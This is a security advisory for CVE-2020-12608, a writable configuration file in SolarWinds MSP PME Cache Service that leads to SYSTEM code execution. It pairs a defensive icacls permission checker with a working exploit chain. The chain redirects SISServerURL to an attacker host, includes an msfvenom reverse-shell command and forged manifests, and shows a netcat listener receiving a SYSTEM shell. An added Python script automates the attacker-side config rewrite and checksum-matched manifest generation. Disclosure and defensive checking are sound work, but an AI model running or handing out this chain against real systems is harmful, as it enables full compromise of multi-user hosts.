# Title: SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions
# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
# Date: 2020-05-06
# Vendor: https://www.solarwindsmsp.com/
# CVE: CVE-2020-12608
# GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608
# CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]
# CWE: 276 (Incorrect Default Permissions)

Vulnerable version
==================
SolarWinds MSP PME (Patch Management Engine) before 1.1.15 (tested on 1.1.14.2223)

Timeline
========
2020-04-24 Vulnerability discovered
2020-04-27 Details sent to SolarWinds PSIRT
2020-04-27 SolarWinds confirmed the vulnerability
2020-05-05 SolarWinds released PME version 1.1.15
2020-05-06 Public disclosure

Description
===========
The SolarWinds MSP Cache Service, which ships as part of the Advanced
Monitoring Agent, is installed with insecure file permissions on its
configuration file, and this can be leveraged for code execution as
SYSTEM. The Cache Service is used to fetch new update definition files
and component versions for ThirdPartyPatch.exe and for the SolarWinds
MSP Patch Management Engine Setup. Its configuration file
CacheService.xml in %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\config\
is writable by normal users, so the SISServerURL parameter, which
controls where updates are downloaded from, can be pointed at a server
the attacker controls. After some analysis we were able to provide
modified definition files (PMESetup_details.xml and
ThirdPartyPatch_details.xml) on our own SISServerURL web server that
point to an executable carrying a reverse TCP payload; the Cache Service
downloads that executable, and it is subsequently run with SYSTEM
privileges.

Proof of Concept (PoC)
======================
By default, CacheService.xml carries an inherited Modify (M) permission
for the built-in Users group, so any user on the system who is a member
of that group can change the file's content. This is a particular
problem on terminal servers and other multi-user systems, where every
interactive user can gain SYSTEM privileges this way.

PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config> icacls .\CacheService.xml
.\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
                   NT-AUTORITÄT\SYSTEM:(I)(F)
                   VORDEFINIERT\Administratoren:(I)(F)

(Output from a German-locale system: VORDEFINIERT\Benutzer is
BUILTIN\Users, NT-AUTORITÄT\SYSTEM is NT AUTHORITY\SYSTEM and
VORDEFINIERT\Administratoren is BUILTIN\Administrators. (I) marks an
inherited ACE, (M) is Modify and (F) is Full control.)

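To check a host for this condition without reading the listing by eye, the following Python script (an added example, not part of the advisory) parses icacls output and flags every ACE that grants a write-capable right to a principal that ordinary local users belong to. The vulnerable sample listing is a constructed copy of the output above; the set of right tokens treated as write-capable, the German-locale principal names and the hypothetical "fixed" listing are assumptions made for this example.

```python
"""Flag write-capable ACEs for low-privileged principals in icacls output.

Added example, not the advisory's own code. The sample listings are
constructed; the token and principal sets below are assumptions.
"""
import re
from typing import List, Set, Tuple

# Constructed copy of the advisory's listing (German-locale system).
ICACLS_VULNERABLE = r""".\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
                   NT-AUTORITÄT\SYSTEM:(I)(F)
                   VORDEFINIERT\Administratoren:(I)(F)
"""

# Constructed, hypothetical listing of a hardened file on an
# English-locale system (the advisory does not show the fixed ACL).
ICACLS_FIXED = r"""C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config\CacheService.xml BUILTIN\Users:(I)(RX)
                   NT AUTHORITY\SYSTEM:(I)(F)
                   BUILTIN\Administrators:(I)(F)
"""

# icacls right tokens that let the holder change the file's content or
# its ACL (assumption: anything in this set counts as write-capable).
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WEA", "WDAC", "WO", "GW", "GA", "DE"}

# Principals that every local low-privileged user is a member of.
# English names plus the German-locale names from the advisory's output
# (assumption made for this example; extend for other locales).
LOW_PRIV = {
    "users", "benutzer",
    "authenticated users", "authentifizierte benutzer",
    "everyone", "jeder",
    "interactive", "interaktiv",
}

# One ACE line: "<principal>:(flag)(flag)...", principal may contain spaces.
_ACE = re.compile(r"^(?P<principal>[^:()]+?):(?P<rights>(?:\([^)]*\))+)\s*$")


def parse_icacls(output: str, path: str) -> List[Tuple[str, Set[str]]]:
    """Return (principal, tokens) for every ACE in icacls output.

    icacls prints the path in front of the first ACE, so `path` must be
    the exact string that was passed to icacls; it is stripped off.
    Blank lines and the trailing summary line are skipped.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        match = _ACE.match(line)
        if not match:
            continue
        tokens: Set[str] = set()
        # Groups like "(Rc,S,RA)" carry several specific rights at once.
        for group in re.findall(r"\(([^)]*)\)", match.group("rights")):
            tokens.update(t.strip().upper() for t in group.split(",") if t.strip())
        aces.append((match.group("principal").strip(), tokens))
    return aces


def weak_aces(output: str, path: str) -> List[Tuple[str, List[str]]]:
    """Return the ACEs that give a low-privileged principal write access."""
    findings = []
    for principal, tokens in parse_icacls(output, path):
        account = principal.rsplit("\\", 1)[-1].lower()
        granted = tokens & WRITE_RIGHTS
        if account in LOW_PRIV and granted:
            findings.append((principal, sorted(granted)))
    return findings


if __name__ == "__main__":
    for label, listing, path in (
        ("vulnerable", ICACLS_VULNERABLE, r".\CacheService.xml"),
        ("fixed", ICACLS_FIXED,
         r"C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config\CacheService.xml"),
    ):
        print(label, "->", weak_aces(listing, path) or "no weak ACEs")
```

On a live host, feed the script the output of `icacls "<full path to CacheService.xml>"` together with the same path string; an empty result means no member of the Users group can rewrite the file.
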
1. Modify CacheService.xml

In the XML file, the SISServerURL parameter is changed so that it points
to a web server controlled by the attacker:

<?xml version="1.0" encoding="utf-8"?>
<Configuration>
  <CachingEnabled>True</CachingEnabled>
  <ApplianceVersion>1.1.14.2223</ApplianceVersion>
  <CacheLocation>C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\cache</CacheLocation>
  <CacheSizeInMB>10240</CacheSizeInMB>
  <SISServerURL>https://evil-attacker.example.org</SISServerURL>
  <LogLevel>5</LogLevel>
  <Proxy></Proxy>
  <ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt>
  <ProxyCacheService />
  <CacheFilesDeleted></CacheFilesDeleted>
  <CacheDeletedInBytes></CacheDeletedInBytes>
  <HostApplication>RMM</HostApplication>
  <CanBypassProxyCacheService>True</CanBypassProxyCacheService>
  <BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds>
  <ComponentUpdateMinutes>300</ComponentUpdateMinutes>
  <ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds>
</Configuration>

2. Payload creation

Generate an executable, for example with msfvenom, that establishes a
reverse TCP connection back to the attacker, and store it on the web
server:

msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f exe > /tmp/solarwinds-shell.exe

3. Prepare web server

Place the modified definition files (PMESetup_details.xml and/or
ThirdPartyPatch_details.xml) on the web server under the path
/ComponentData/RMM/1/, calculate the MD5, SHA1 and SHA256 checksums of
the executable, set SizeInBytes to its exact size and increase the
version so that it is newer than the installed one (the installed
ApplianceVersion above is 1.1.14.2223, so 1.1.14.2224 is advertised).

Example of PMESetup_details.xml

<ComponentDetails>
  <Name>Patch Management Engine</Name>
  <Description>Patch Management Engine</Description>
  <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
  <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
  <SHA256Checksum>80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65</SHA256Checksum>
  <SizeInBytes>7168</SizeInBytes>
  <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
  <FileName>solarwinds-shell.exe</FileName>
  <Architecture>x86,x64</Architecture>
  <Locale>all</Locale>
  <Version>1.1.14.2224</Version>
</ComponentDetails>

Example of ThirdPartyPatch_details.xml

<ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Name>Third Party Patch</Name>
  <Description>Third Party Patch application for Patch Management Engine RMM v 1 and later</Description>
  <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
  <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
  <SHA256Checksum>80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65</SHA256Checksum>
  <SizeInBytes>7168</SizeInBytes>
  <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
  <FileName>solarwinds-shell.exe</FileName>
  <Architecture>x86,x64</Architecture>
  <Locale>all</Locale>
  <Version>1.2.1.95</Version>
</ComponentDetails>

4. Malicious executable download

After a restart of the system, or once CacheService.xml is reloaded, the
service connects to the attacker-controlled web server and downloads the
executable. The file is stored under
%PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and
%PROGRAMDATA%\SolarWinds MSP\PME\archives\. The web server log shows a
HEAD request followed by the actual download:

[24/Apr/2020:10:57:01 +0200] "HEAD /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"
[24/Apr/2020:10:57:01 +0200] "GET /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"

5. Getting shell

After some time the executable is run by the SolarWinds MSP RPC Server
service and connects back to the attacker with the rights of
NT AUTHORITY\SYSTEM:

[~]: nc -nlvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
Microsoft Windows [Version 10.0.18363.778]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt-authority\system

C:\WINDOWS\system32>

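Steps 1 and 3 above can be scripted. The following Python code is an added example rather than the advisory's own tooling: it rewrites SISServerURL in a copy of CacheService.xml and generates a *_details.xml manifest whose checksums, SizeInBytes and Version match a given payload, using the element names from the advisory's XML samples. The trimmed CacheService.xml with a placeholder original URL, the three-byte stand-in payload and the rule of bumping the last version component are assumptions made for this example.

```python
"""Attacker-side preparation for the PoC (steps 1 and 3).

Added example, not the advisory's own code. Element names follow the
advisory's XML samples; the trimmed config below, the sample payload and
the version-bump rule are assumptions made for this example.
"""
import hashlib
import xml.etree.ElementTree as ET
from typing import Dict, Tuple

# Constructed, trimmed stand-in for CacheService.xml. The SISServerURL
# value is a placeholder, not the vendor's real update server.
SAMPLE_CACHESERVICE_XML = """<?xml version="1.0" encoding="utf-8"?>
<Configuration>
  <CachingEnabled>True</CachingEnabled>
  <ApplianceVersion>1.1.14.2223</ApplianceVersion>
  <SISServerURL>https://original-sis.example</SISServerURL>
  <HostApplication>RMM</HostApplication>
</Configuration>
"""


def set_sis_server_url(config_xml: str, new_url: str) -> str:
    """Step 1: return config_xml with <SISServerURL> pointing at new_url."""
    root = ET.fromstring(config_xml)
    node = root.find("SISServerURL")
    if node is None:
        raise ValueError("no <SISServerURL> element in CacheService.xml")
    node.text = new_url
    return ET.tostring(root, encoding="unicode")


def bump_version(version: str) -> str:
    """Increase the last dotted component: 1.1.14.2223 -> 1.1.14.2224.

    The manifest has to advertise a version newer than the installed
    ApplianceVersion, otherwise there is nothing for the service to fetch.
    """
    parts = version.split(".")
    parts[-1] = str(int(parts[-1]) + 1)
    return ".".join(parts)


def build_details_xml(payload: bytes, name: str, file_name: str,
                      download_dir: str, version: str) -> str:
    """Step 3: build a <ComponentDetails> manifest describing payload.

    Checksums and SizeInBytes are computed from the actual bytes, as the
    advisory requires them to match the served executable.
    """
    root = ET.Element("ComponentDetails")
    fields = [
        ("Name", name),
        ("Description", name),
        ("MD5Checksum", hashlib.md5(payload).hexdigest()),
        ("SHA1Checksum", hashlib.sha1(payload).hexdigest()),
        ("SHA256Checksum", hashlib.sha256(payload).hexdigest()),
        ("SizeInBytes", str(len(payload))),
        ("DownloadURL", download_dir.rstrip("/") + "/" + file_name),
        ("FileName", file_name),
        ("Architecture", "x86,x64"),
        ("Locale", "all"),
        ("Version", version),
    ]
    for tag, text in fields:
        ET.SubElement(root, tag).text = text
    return ET.tostring(root, encoding="unicode")


def parse_details_xml(details_xml: str) -> Dict[str, str]:
    """Read a manifest back into a dict, e.g. to double-check what was written."""
    root = ET.fromstring(details_xml)
    return {child.tag: (child.text or "").strip() for child in root}


def prepare(payload: bytes, installed_version: str, config_xml: str,
            attacker_url: str) -> Tuple[str, str]:
    """Produce the patched CacheService.xml and the matching manifest."""
    new_config = set_sis_server_url(config_xml, attacker_url)
    manifest = build_details_xml(
        payload, "Patch Management Engine", "solarwinds-shell.exe",
        "/ComponentData/RMM/1", bump_version(installed_version))
    return new_config, manifest


if __name__ == "__main__":
    # b"abc" is a constructed stand-in for the real reverse-shell executable.
    config, manifest = prepare(b"abc", "1.1.14.2223",
                               SAMPLE_CACHESERVICE_XML,
                               "https://evil-attacker.example.org")
    print(config)
    print(manifest)
```

Write the first result back to the config path from the advisory and serve the second as /ComponentData/RMM/1/PMESetup_details.xml next to the executable; the remaining steps (restart or reload, download, execution) are performed by the service itself.
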
Fix
===
SolarWinds released PME version 1.1.15, which is delivered through the
product's auto-update mechanism. After the update, verify that the
installed version is 1.1.15 or later and that CacheService.xml is no
longer writable by the Users group.
https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/